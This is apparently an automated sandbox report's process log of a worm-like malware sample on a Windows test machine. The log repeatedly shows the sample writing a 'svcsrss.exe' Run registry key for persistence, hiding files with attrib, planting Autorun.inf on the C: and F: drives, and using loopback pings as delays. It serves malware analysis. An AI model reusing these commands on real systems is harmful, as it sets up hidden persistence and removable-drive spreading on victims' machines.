C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:3668
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4464
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5032
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3264
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4624
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1156
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:4684
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2600
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2544
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3552
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4228
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2808
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4432
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3632
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:444
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3380
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:212
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:5044
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4408
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1552
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:876
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2880
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3412
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3608
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4092
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:764
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3040
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1152
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4540
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3800
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1520
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3164
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:3964
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1352
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2588
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1248
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1048
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:3088
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:3672
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2816
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4768
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1632
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4128
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:3264
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3096
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1156
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:868
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3004
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4104
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4944
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3240
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4228
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:5048
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3604
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3632
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2524
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3816
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1644
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4564
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2868
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4420
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4548
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4456
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:3700
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5004
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:900
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4388
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:864
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4516
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:1580
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4280
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2780
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1092
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4760
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:4540
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3376
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:5012
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3164
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1972
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2588
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2852
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3508
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1752
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:5088
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2564
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1360
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1912
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3580
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2920
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4464
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1344
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1336
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4860
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2064
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4684
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:1868
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2972
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3592
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:5116
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1016
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2420
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:628
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4852
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:432
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:64
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4764
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:3612
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3212
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1228
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4564
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4212
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:5044
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4012
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1920
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3640
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4488
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:516
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1044
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2856
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4836
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4692
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4740
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:764
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3040
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2404
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3800
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:2672
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2012
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3164
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:5100
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:5104
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:4000
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:440
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4340
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2816
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4452
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:4844
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:376
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:5108
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4008
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2084
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2648
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4928
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2536
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3064
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1472
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4052
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2488
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1640
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3260
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2928
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4984
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3536
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4496
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:868
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:2544
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:3896
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:5116
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:756
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3600
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4204
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3228
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:3652
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:3296
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4852
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4752
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4312
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1464
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:3380
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3312
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:3368
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1504
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4564
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4212
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:5044
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4012
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2796
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4196
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:1948
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3020
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:876
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:864
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4772
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:1172
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4080
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3876
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:764
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1168
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:2404
-
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v System /t REG_SZ /d "C:\Windows\system32\svcsrss.exe" /f3⤵
- Adds Run key to start application
PID:4016
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\Autorun.inf"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2996
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h "C:\Users\Admin\ConfiguraçΣes locais\Application Data\Microsoft\CD Burning\svcsrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:964
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2672
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:3304
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h C:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1520
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h C:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:2888
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3248
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4744
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:2440
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -s -h F:\Autorun.inf3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:4768
-
-
C:\Windows\SysWOW64\attrib.exeattrib +r +s +h F:\Autorun.inf3⤵
- Sets file to hidden
- Drops autorun.inf file
- Views/modifies file attributes
PID:112
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4492
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:4596
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4600
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:4464
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2664
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:2716
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:1000
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵
- Runs ping.exe
PID:4244
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵
- Runs ping.exe
PID:1060
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 23⤵PID:4980
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -l 32500 -w 1 -n 13⤵PID:3288
-
-
